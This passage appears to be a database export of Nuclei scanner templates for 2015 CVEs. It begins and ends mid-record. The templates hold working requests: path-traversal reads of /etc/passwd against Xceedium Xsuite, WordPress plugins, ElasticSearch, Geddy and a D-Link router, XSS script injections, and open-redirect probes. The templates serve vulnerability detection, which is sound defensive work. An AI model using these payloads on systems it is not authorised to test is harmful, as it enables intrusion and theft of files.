4a0a00473045022100b05f415f11986e6b3ad650b585140749b2b8035d73f2931f6e78f4c5f6f5232b02203a635de3c9935dc598ec196c69eb432a53de2c3b9891cb839d776160f1d0fdf8:922c64590222798bb761d5b6d8e72950", "hash": "436d35fb15cd6f632f858d46cc91659c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f59" }, "name": "CVE-2015-4666.yaml", "content": "id: CVE-2015-4666\n\ninfo:\n name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion\n author: 0x_Akoko\n severity: medium\n description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, disclosure of sensitive information, and potential remote code execution.\n remediation: |\n Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor.\n reference:\n - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt\n - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4666\n - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html\n - https://www.exploit-db.com/exploits/37708/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-4666\n cwe-id: CWE-22\n epss-score: 0.02372\n epss-percentile: 0.89592\n cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xceedium\n product: xsuite\n tags: cve2015,cve,xceedium,xsuite,lfi,packetstorm,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009504e159cca2e8deb672bbe64a5cb5a8e8ff799780737da40e678ffc7d3e8e32022100af48ee950842847322cef0c2137c1dcbeceda0acf700cdde60d7c2e7d1a02175:922c64590222798bb761d5b6d8e72950", "hash": "21824a4e3e3bef68e825c68cdc2f227e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5a" }, "name": "CVE-2015-4668.yaml", "content": "id: CVE-2015-4668\n\ninfo:\n name: Xsuite <=2.4.4.5 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability.\n reference:\n - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt\n - https://vuldb.com/?id.107082\n - https://www.exploit-db.com/exploits/37708/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4668\n - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2015-4668\n cwe-id: CWE-601\n epss-score: 0.00397\n epss-percentile: 0.73024\n cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xceedium\n product: xsuite\n tags: cve2015,cve,redirect,xsuite,xceedium,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/openwin.php?redirurl=http://interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4b0a004830460221009ee0f100e63fe1fb1f2fce30cefa8ea106fd61cde30ad3bbfe3ca713cc92dec602210098683f371b4cedc1c1d7f39a8a6aba9b813b585294104980333339b5e76ce0a5:922c64590222798bb761d5b6d8e72950", "hash": "fcbd28d15e39375190b752deb46cc73a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5b" }, "name": "CVE-2015-4694.yaml", "content": "id: CVE-2015-4694\n\ninfo:\n name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval\n author: 0x_Akoko\n severity: high\n description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.\n impact: |\n Arbitrary file retrieval\n remediation: |\n Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed.\n reference:\n - https://wordpress.org/plugins/zip-attachments/#developers\n - https://wpscan.com/vulnerability/8047\n - https://nvd.nist.gov/vuln/detail/CVE-2015-4694\n - http://www.vapid.dhs.org/advisory.php?v=126\n - https://wordpress.org/plugins/zip-attachments/changelog/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2015-4694\n cwe-id: CWE-22\n epss-score: 0.02304\n epss-percentile: 0.88593\n cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: zip_attachments_project\n product: zip_attachments\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/zip-attachments\"\n tags: cve2015,cve,wp-plugin,wpscan,lfi,wordpress,zip_attachments_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220207ba0410481b90cdbf301df5d34518b015c8ec9366803c31be44661113a9e01022044ad895219f4df49dc7037ad7b8420987cde05403fb36fe58603419476a063b2:922c64590222798bb761d5b6d8e72950", "hash": "c25ce8e487ab715ab07fd4b03b68ca43", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5c" }, "name": "CVE-2015-5354.yaml", "content": "id: CVE-2015-5354\n\ninfo:\n name: Novius OS 5.0.1-elche - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Novius OS.\n reference:\n - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html\n - https://vuldb.com/?id.76181\n - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html\n - https://nvd.nist.gov/vul n/detail/CVE-2015-5354\n - https://www.exploit-db.com/exploits/37439/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2015-5354\n cwe-id: CWE-601\n epss-score: 0.00166\n epss-percentile: 0.53247\n cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: novius-os\n product: novius_os\n tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a0047304502201fa0d9d2f70b020f889d8f45ac1c39f17dc563a71461963cc4c57b569f70d096022100ef358f446f62fcfbf11e15fb21855a3061d1f1cd2c38509a6fa7fc32a0256bf7:922c64590222798bb761d5b6d8e72950", "hash": "b66b14e6b1d58a926afd9990fc3419ff", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5d" }, "name": "CVE-2015-5461.yaml", "content": "id: CVE-2015-5461\n\ninfo:\n name: WordPress StageShow <5.0.9 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter.\n impact: |\n An attacker can trick users into visiting a malicious website, leading to potential phishing attacks.\n remediation: |\n Update to the latest version of the WordPress StageShow plugin (5.0.9 or higher) to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16\n - https://wordpress.org/plugins/stageshow/changelog/\n - http://seclists.org/fulldisclosure/2015/Jul/27\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5461\n - https://plugins.trac.wordpress.org/changeset/1165310/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N\n cvss-score: 6.4\n cve-id: CVE-2015-5461\n cwe-id: NVD-CWE-Other\n epss-score: 0.0055\n epss-percentile: 0.77025\n cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: stageshow_project\n product: stageshow\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/stageshow/\"\n tags: cve2015,cve,wpscan,seclists,redirect,wordpress,wp-plugin,stageshow_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4a0a0047304502202859b878c456815dc2de4f34ef7ce4fbb5ce6868f17e145a47e5df1cf4a008df022100e1c8f735f6d9f14d8b5ba3d296c48f6b74d7152c59bc4eee04a4f4ee38ea61b7:922c64590222798bb761d5b6d8e72950", "hash": "c527fd250c88cafa3fbe86511b687424", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5e" }, "name": "CVE-2015-5469.yaml", "content": "id: CVE-2015-5469\n\ninfo:\n name: WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php.\n impact: |\n The vulnerability can lead to unauthorized access to sensitive files, execution of arbitrary code, and potential compromise of the entire WordPress installation.\n remediation: |\n Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor.\n reference:\n - https://www.openwall.com/lists/oss-security/2015/07/10/5\n - http://www.vapid.dhs.org/advisory.php?v=133\n - http://www.openwall.com/lists/oss-security/2015/07/10/5\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5469\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-5469\n cwe-id: CWE-22\n epss-score: 0.02176\n epss-percentile: 0.88248\n cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: mdc_youtube_downloader_project\n product: mdc_youtube_downloader\n framework: wordpress\n tags: cve2015,cve,wp,lfi,mdc_youtube_downloader_project,wordpress\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ff5f92a49920cd8381ad88a3856050db835c74ab7946be53e0a1a413f0b190290220332d02cd0e4a2dd43ebccfbf82bba432e28fe572daf36a85f1ef7e36420aa6c6:922c64590222798bb761d5b6d8e72950", "hash": "8c47d7c3ba6566c877bffc7b918e76bf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f5f" }, "name": "CVE-2015-5471.yaml", "content": "id: CVE-2015-5471\n\ninfo:\n name: Swim Team <= v1.44.10777 - Local File Inclusion\n author: 0x_Akoko\n severity: medium\n description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.\n impact: |\n An attacker can exploit this vulnerability to read sensitive information from the server, such as database credentials, and potentially execute arbitrary code.\n remediation: Upgrade to Swim Team version 1.45 or newer.\n reference:\n - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568\n - http://www.vapid.dhs.org/advisory.php?v=134\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5471\n - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html\n - http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2015-5471\n cwe-id: CWE-22\n epss-score: 0.10406\n epss-percentile: 0.94855\n cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: swim_team_project\n product: swim_team\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-swimteam\"\n tags: cve2015,cve,wordpress,wp-plugin,lfi,wpscan,packetstorm,swim_team_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202cd291f5c987553fe7226cae955afcf8510a3d8336df8bd95ef30fd3b37acd6202210087d411bcb4248de1f5e045aa50a4ca6aee4f54950d3be9be44c2d64bd8b69287:922c64590222798bb761d5b6d8e72950", "hash": "dadde2181a6f552e0cbe46510b413e5d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f60" }, "name": "CVE-2015-5531.yaml", "content": "id: CVE-2015-5531\n\ninfo:\n name: ElasticSearch <1.6.1 - Local File Inclusion\n author: princechaddha\n severity: medium\n description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5531\n - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html\n - https://www.elastic.co/community/security/\n - http://packetstormsecurity.com/files/133797/ElasticSearch-Path-Traversal-Arbitrary-File-Download.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-5531\n cwe-id: CWE-22\n epss-score: 0.97144\n epss-percentile: 0.99783\n cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: elasticsearch\n product: elasticsearch\n tags: cve2015,cve,vulhub,packetstorm,elasticsearch,intrusive\n\nhttp:\n - raw:\n - |\n PUT /_snapshot/test HTTP/1.1\n Host: {{Hostname}}\n\n {\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"/usr/share/elasticsearch/repo/test\"\n }\n }\n - |\n PUT /_snapshot/test2 HTTP/1.1\n Host: {{Hostname}}\n\n {\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"/usr/share/elasticsearch/repo/test/snapshot-backdata\"\n }\n }\n - |\n GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ElasticsearchParseException\n - Failed to derive xcontent from\n - 114, 111, 111, 116, 58\n condition: and\n\n - type: status\n status:\n - 400\n# digest: 490a0046304402207c1a1828c260cd9afadd9844c9419a43cc0071d0c854a31ad8e4b6fabcb4d3720220461e43e06c10d317f6b91bfe48ee71c3848bd2d8dcb41ea01f454d3f3281c01a:922c64590222798bb761d5b6d8e72950", "hash": "88453cac999936daf43a24c73d685be4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f61" }, "name": "CVE-2015-5688.yaml", "content": "id: CVE-2015-5688\n\ninfo:\n name: Geddy <13.0.8 - Local File Inclusion\n author: pikpikcu\n severity: medium\n description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.\n impact: |\n The vulnerability can be exploited to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.\n remediation: |\n Upgrade Geddy to version 13.0.8 or later to mitigate the vulnerability.\n reference:\n - https://nodesecurity.io/advisories/geddy-directory-traversal\n - https://github.com/geddy/geddy/issues/697\n - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231\n - https://nvd.nist.gov/vuln/detail/CVE-2015-5688\n - https://github.com/geddy/geddy/pull/699\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-5688\n cwe-id: CWE-22\n epss-score: 0.01347\n epss-percentile: 0.84665\n cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: geddyjs\n product: geddy\n framework: node.js\n tags: cve2015,cve,geddy,lfi,geddyjs,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205488f218bf2c3c7f54b39eb4a23b2b8168ef4c98f3be02378805ef5f6d92965c022100a55527149f23f2bf1990d33ec040e1260b8a1583966e4680161b9a31a65e5d28:922c64590222798bb761d5b6d8e72950", "hash": "79da334db2547ecc60d6ba4c6dc7ad8f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f62" }, "name": "CVE-2015-6477.yaml", "content": "id: CVE-2015-6477\n\ninfo:\n name: Nordex NC2 - Cross-Site Scripting\n author: geeknik\n severity: medium\n description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2015/Dec/117\n - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01\n - https://nvd.nist.gov/vuln/detail/CVE-2015-6477\n - http://packetstormsecurity.com/files/135068/Nordex-Control-2-NC2-SCADA-16-Cross-Site-Scripting.html\n - http://seclists.org/fulldisclosure/2015/Dec/117\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-6477\n cwe-id: CWE-79\n epss-score: 0.00277\n epss-percentile: 0.64954\n cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nordex\n product: nordex_control_2_scada\n tags: cve2015,cve,seclists,packetstorm,xss,iot,nordex,nc2\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/login\"\n\n body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"\"\n# digest: 4a0a00473045022100f172e6a8b04574670491e79e79a2c9354eb33e7efdcd15e04ee77d95c0d065e602207e351f4b898601051e7cc3a381f3a71ae71cfd449968bc2d3808cb90fc44b49f:922c64590222798bb761d5b6d8e72950", "hash": "1b4b2685a603aaf67392ca01ad6aea51", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f63" }, "name": "CVE-2015-6544.yaml", "content": "id: CVE-2015-6544\n\ninfo:\n name: Combodo iTop <2.2.0-2459 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a version of Combodo iTop that is equal to or greater than 2.2.0-2459 to mitigate this vulnerability.\n reference:\n - https://www.htbridge.com/advisory/HTB23268\n - http://sourceforge.net/p/itop/tickets/1114/\n - http://sourceforge.net/p/itop/code/3662/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-6544\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2015-6544\n cwe-id: CWE-79\n epss-score: 0.00284\n epss-percentile: 0.65327\n cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: combodo\n product: itop\n tags: cve2015,cve,xss,itop,combodo\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022013f90d189ae5ac5476831a4927449c347bfbaa93302d536ceaebce970c524d5e0221008b3dd9695bcfbefd887835ce46562a46310858a81f115f521bd1b06ae4faeab1:922c64590222798bb761d5b6d8e72950", "hash": "4b8c5d57be92f38c5613904d3c3c7ed5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f64" }, "name": "CVE-2015-6920.yaml", "content": "id: CVE-2015-6920\n\ninfo:\n name: WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability.\n remediation: |\n Upgrade to the latest version of WordPress sourceAFRICA (>=0.1.4) which includes a fix for this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html\n - https://wpvulndb.com/vulnerabilities/8169\n - https://nvd.nist.gov/vuln/detail/CVE-2015-6920\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-6920\n cwe-id: CWE-79\n epss-score: 0.0016\n epss-percentile: 0.52637\n cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: sourceafrica_project\n product: sourceafrica\n framework: wordpress\n tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'SourceAfrica'\n - 'Tags:'\n condition: and\n case-insensitive: true\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009cba36ff243cc2b1d9c4a151b396958b4caf82584c82cf9f9e9b6892d403cf6c022018312ae7e0cb0e95f6fbd1cb4d1062102feb8dfab9b1cf125d3da648ffdde45f:922c64590222798bb761d5b6d8e72950", "hash": "9a1a09e8ccea3f1194b1166a07c47846", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f65" }, "name": "CVE-2015-7245.yaml", "content": "id: CVE-2015-7245\n\ninfo:\n name: D-Link DVG-N5402SP - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter.\n impact: |\n An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information.\n remediation: |\n Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability.\n reference:\n - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html\n - https://www.exploit-db.com/exploits/39409/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7245\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-7245\n cwe-id: CWE-22\n epss-score: 0.96881\n epss-percentile: 0.99685\n cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: d-link\n product: dvg-n5402sp_firmware\n tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link\n\nhttp:\n - raw:\n - |\n POST /cgibin/webproc HTTP/1.1\n Host: {{Hostname}}\n\n getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a00473045022100d1aafb8c10f1a664ef200cb0b07719e65cca20f646b773edd9631bbd351283b102206cf94666854313f20d7360c569b2d3fa912b5887a16ae63b1dcf827a26d04341:922c64590222798bb761d5b6d8e72950", "hash": "b046b53c54b0e6499237e05664a8d5a3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f66" }, "name": "CVE-2015-7297.yaml", "content": "id: CVE-2015-7297\n\ninfo:\n name: Joomla! Core SQL Injection\n author: princechaddha\n severity: high\n description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Joomla! CMS.\n remediation: |\n Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7297\n - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html\n - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/\n - http://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.html\n - http://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2015-7297\n cwe-id: CWE-89\n epss-score: 0.97564\n epss-percentile: 0.99999\n cpe: cpe:2.3:a:joomla:joomla\\!:3.2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomla\n product: joomla\\!\n tags: cve2015,cve,packetstorm,joomla,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - 